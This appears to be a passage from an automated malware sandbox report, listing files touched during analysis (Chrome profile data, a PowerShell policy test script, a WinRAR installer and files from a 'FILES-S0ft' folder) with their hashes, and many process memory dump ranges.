3efda14a00755904df4028258369d06612d0c925

SHA256
6ec6924c6d096d60918fbfb1c7ebe7e7e287377710718261ce85fab089459788

SHA512
f043902bd00874211d8e6901cd8a2ed405a9d851a4230b21fb09c087555fe4cf66fa8c6ddedc99183ec7ff5dc5438a44321db7db834b0f47decdbdf0f2a78e00

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
171KB

MD5
e08d379436ce3bf27c5c2ad835ca4a48

SHA1
f93e3d66eee2516cc21e3dfd6a67be385b5bb40e

SHA256
f7a997964b37830d749b359e1eac6f6c13a8ce9f0ddde5f5c98257b5812a9662

SHA512
50c3456a59c0c112b8be1a01a1ca10cce6c3b6cf538c6b1b5841e1e7d40f5770576bb52d5190891652d9dd1c7ed443921a0d1881b691597d5b2275a4ab0ff63a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
113KB

MD5
6c6e8c4d3c09d858bbd480d30bce87ac

SHA1
1476810722353c6b9afe7b539774aedafb7e0875

SHA256
cdceb49ad4189c6844d98acdd66f70da9e929c4d8a4065ac48c2708271ab7416

SHA512
878ce0f3aff99b480a3bbddd771e3a7ee645b5b5b61fa5a637d143bcacf97a870fdb9dfc0d92f876599bf7178155c23aed4b41050166c68d1175b18900fd2a55

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
109KB

MD5
572f3628e21a2aae6a961582bdcaeefc

SHA1
2d1aa93fc1db8cca153e5d4bbee9727bf08e1106

SHA256
71d09ccd016d261cdb5cde202c7fc3514d8b2c398e4da76d494b9187a1295c38

SHA512
c5fc39cb0f933c5bed43382730d43f0fa9efc9428d0e62991d300f4f4bd072d4110ec8f4ae5db9905318cf7d1d3b472df0b24c78bae15849f3decfeabb075fa8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe580c5f.TMP

Filesize
103KB

MD5
dbfab1c41d3a691bfcaab3df5b701228

SHA1
e067a839a3ba775000b5c98b7d1d2633ff4830b3

SHA256
6b7fd472c257aeceace509de23fb41dadbfeb9d3eb7d1093a4494e30d31381b3

SHA512
e653b7269023d548259986b0ed165830089d1f76ddb4f2b3cdbbcf526c9dea9cfbd8550800478566bad17f63c63ddee7b4bf7510035c81c36b8e7621d327adbe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2g5nkoqf.kvh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\FILES-S0ft\UIThemes\locales\bg.pak.info

Filesize
554KB

MD5
8a679c02bfbb88c2760ca0d962c0b1c8

SHA1
70b1528af5c62336043b2531fa7b477f9412278d

SHA256
bda7bd9f39a00b007f21a4e9b82fcd2267f4dfbd53800379210ab4f91e982529

SHA512
df1031975a8acdcc471638dc21642c5081c9edb704382fd05c63ca638c61c637ceb97a480a18cfd3a1c784c020a2f2cf853f8c9bad5e3b3e3857c7ee25ea26a3

Download Submit
C:\Users\Admin\Downloads\FILES-S0ft\skin\img\icons\vpn-logo.svg

Filesize
1KB

MD5
9156731077e93b00c3b0f6c2d94ad4e8

SHA1
6a9e87a8b193444924dcb7e469dd3f77e4a823db

SHA256
f936e40447710b9c4c773cdf04863bc6600a51b058997f23d2efefd84ce03a3a

SHA512
33364214336f472b28b229796609257a1d4969548427fd9c7ce7f7878fde04eb00d7e1b2631a9b212fe72aaef73bd510fcad482b4f7089d2ace6d946f4cb5dbc

Download Submit
C:\Users\Admin\Downloads\winrar-x64-622.exe

Filesize
3.4MB

MD5
8a3faa499854ea7ff1a7ea5dbfdfccfb

SHA1
e0c4e5f7e08207319637c963c439e60735939dec

SHA256
e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff

SHA512
4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25

Download Submit
C:\Users\Admin\Downloads\winrar-x64-622.exe

Filesize
3.4MB

MD5
8a3faa499854ea7ff1a7ea5dbfdfccfb

SHA1
e0c4e5f7e08207319637c963c439e60735939dec

SHA256
e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff

SHA512
4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25

Download Submit
C:\Users\Admin\Downloads\winrar-x64-622.exe

Filesize
3.4MB

MD5
8a3faa499854ea7ff1a7ea5dbfdfccfb

SHA1
e0c4e5f7e08207319637c963c439e60735939dec

SHA256
e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff

SHA512
4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25

Download Submit
memory/224-2099-0x00007FF4BADD0000-0x00007FF4BADE0000-memory.dmp

Filesize
64KB

Download
memory/224-2127-0x000002101AD80000-0x000002101AD88000-memory.dmp

Filesize
32KB

Download
memory/224-2100-0x000002101AD90000-0x000002101ADAC000-memory.dmp

Filesize
112KB

Download
memory/224-2129-0x000002101ADC0000-0x000002101ADCA000-memory.dmp

Filesize
40KB

Download
memory/224-2098-0x000002101AC20000-0x000002101AC2A000-memory.dmp

Filesize
40KB

Download
memory/224-2097-0x000002101AB40000-0x000002101AB5C000-memory.dmp

Filesize
112KB

Download
memory/224-2086-0x000002101A710000-0x000002101A720000-memory.dmp

Filesize
64KB

Download
memory/224-2068-0x000002101A710000-0x000002101A720000-memory.dmp

Filesize
64KB

Download
memory/224-2069-0x000002101A710000-0x000002101A720000-memory.dmp

Filesize
64KB

Download
memory/224-2125-0x000002101AD70000-0x000002101AD7A000-memory.dmp

Filesize
40KB

Download
memory/224-2126-0x000002101ADD0000-0x000002101ADEA000-memory.dmp

Filesize
104KB

Download
memory/224-2128-0x000002101ADB0000-0x000002101ADB6000-memory.dmp

Filesize
24KB

Download
memory/2020-2133-0x000001EDB1E00000-0x000001EDB1E10000-memory.dmp

Filesize
64KB

Download
memory/2020-2134-0x000001EDB1E00000-0x000001EDB1E10000-memory.dmp

Filesize
64KB

Download
memory/2020-2135-0x000001EDB1E00000-0x000001EDB1E10000-memory.dmp

Filesize
64KB

Download
memory/2716-1609-0x0000000000600000-0x0000000000601000-memory.dmp

Filesize
4KB

Download
memory/2716-1603-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/2716-1612-0x0000000000620000-0x0000000000621000-memory.dmp

Filesize
4KB

Download
memory/2716-1604-0x00000000005D0000-0x00000000005D1000-memory.dmp

Filesize
4KB

Download
memory/2716-1610-0x0000000000610000-0x0000000000611000-memory.dmp

Filesize
4KB

Download
memory/2716-1632-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/2716-1614-0x0000000000710000-0x00000000014C6000-memory.dmp

Filesize
13.7MB

Download
memory/2716-1606-0x00000000005F0000-0x00000000005F1000-memory.dmp

Filesize
4KB

Download
memory/3116-1913-0x0000000000680000-0x0000000000FA9000-memory.dmp

Filesize
9.2MB

Download
memory/3116-1929-0x0000000000680000-0x0000000000FA9000-memory.dmp

Filesize
9.2MB

Download
memory/3636-2464-0x00000212E5BF0000-0x00000212E5C00000-memory.dmp

Filesize
64KB

Download
memory/3636-2465-0x00000212E5BF0000-0x00000212E5C00000-memory.dmp

Filesize
64KB

Download
memory/3636-2463-0x00000212E5BF0000-0x00000212E5C00000-memory.dmp

Filesize
64KB

Download
memory/4048-1769-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-1774-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-2178-0x0000000000E00000-0x0000000001729000-memory.dmp

Filesize
9.2MB

Download
memory/4048-2171-0x0000000000E00000-0x0000000001729000-memory.dmp

Filesize
9.2MB

Download
memory/4048-1779-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-1778-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-1777-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-1776-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-1775-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-1767-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-1773-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4048-1768-0x00000247FE340000-0x00000247FE341000-memory.dmp

Filesize
4KB

Download
memory/4152-2113-0x000002A23ED40000-0x000002A23ED50000-memory.dmp

Filesize
64KB

Download
memory/4152-2110-0x000002A23ED40000-0x000002A23ED50000-memory.dmp

Filesize
64KB

Download
memory/4152-2111-0x000002A23ED40000-0x000002A23ED50000-memory.dmp

Filesize
64KB

Download
memory/4152-2112-0x000002A23ED40000-0x000002A23ED50000-memory.dmp

Filesize
64KB

Download
memory/4156-2449-0x00000231EF750000-0x00000231EF760000-memory.dmp

Filesize
64KB

Download
memory/4156-2448-0x00000231EF750000-0x00000231EF760000-memory.dmp

Filesize
64KB

Download
memory/4392-1877-0x0000000000A90000-0x00000000013B9000-memory.dmp

Filesize
9.2MB

Download
memory/4392-1910-0x0000000000A90000-0x00000000013B9000-memory.dmp

Filesize
9.2MB

Download
memory/4392-1805-0x0000000000A90000-0x00000000013B9000-memory.dmp

Filesize
9.2MB

Download
memory/4396-2469-0x0000000000630000-0x0000000000F59000-memory.dmp

Filesize
9.2MB

Download
memory/4396-2429-0x0000000000630000-0x0000000000F59000-memory.dmp

Filesize
9.2MB

Download
memory/4992-1957-0x00000220753B0000-0x00000220753C0000-memory.dmp

Filesize
64KB

Download
memory/4992-1956-0x00000220753B0000-0x00000220753C0000-memory.dmp

Filesize
64KB

Download
memory/4992-1955-0x00000220753B0000-0x00000220753C0000-memory.dmp

Filesize
64KB

Download
memory/5036-2428-0x0000000000520000-0x0000000000E49000-memory.dmp

Filesize
9.2MB

Download
memory/5036-2427-0x0000000000520000-0x0000000000E49000-memory.dmp

Filesize
9.2MB

Download
memory/5036-2408-0x0000000000520000-0x0000000000E49000-memory.dmp

Filesize
9.2MB

Download
memory/5060-2175-0x000002009E900000-0x000002009E940000-memory.dmp

Filesize
256KB

Download
memory/5348-2157-0x000001116D400000-0x000001116D410000-memory.dmp

Filesize
64KB

Download
memory/5348-2162-0x000001116D400000-0x000001116D410000-memory.dmp

Filesize
64KB

Download
memory/5348-2158-0x000001116D400000-0x000001116D410000-memory.dmp

Filesize
64KB

Download
memory/5348-2159-0x000001116D400000-0x000001116D410000-memory.dmp

Filesize
64KB

Download
memory/5364-2167-0x0000000000E00000-0x0000000001729000-memory.dmp

Filesize
9.2MB

Download
memory/5364-1961-0x0000000000E00000-0x0000000001729000-memory.dmp

Filesize
9.2MB

Download
memory/5364-1915-0x0000000000E00000-0x0000000001729000-memory.dmp

Filesize
9.2MB

Download
memory/5408-1942-0x000001631A8C0000-0x000001631A8D0000-memory.dmp

Filesize
64KB

Download
memory/5408-1936-0x00000163024D0000-0x00000163024F2000-memory.dmp

Filesize
136KB

Download
memory/5408-1941-0x000001631A8C0000-0x000001631A8D0000-memory.dmp

Filesize
64KB

Download
memory/5852-2067-0x0000000000500000-0x0000000000E29000-memory.dmp

Filesize
9.2MB

Download
memory/5852-2059-0x0000000000500000-0x0000000000E29000-memory.dmp

Filesize
9.2MB

Download
memory/6048-1605-0x00000000018C0000-0x00000000018C1000-memory.dmp

Filesize
4KB

Download
memory/6048-1607-0x00000000018D0000-0x00000000018D1000-memory.dmp

Filesize
4KB

Download
memory/6048-1613-0x0000000003480000-0x0000000003481000-memory.dmp

Filesize
4KB

Download
memory/6048-1611-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/6048-1608-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/6048-1615-0x00000000035A0000-0x00000000035A1000-memory.dmp

Filesize
4KB

Download
memory/6048-1616-0x0000000000710000-0x00000000014C6000-memory.dmp

Filesize
13.7MB

Download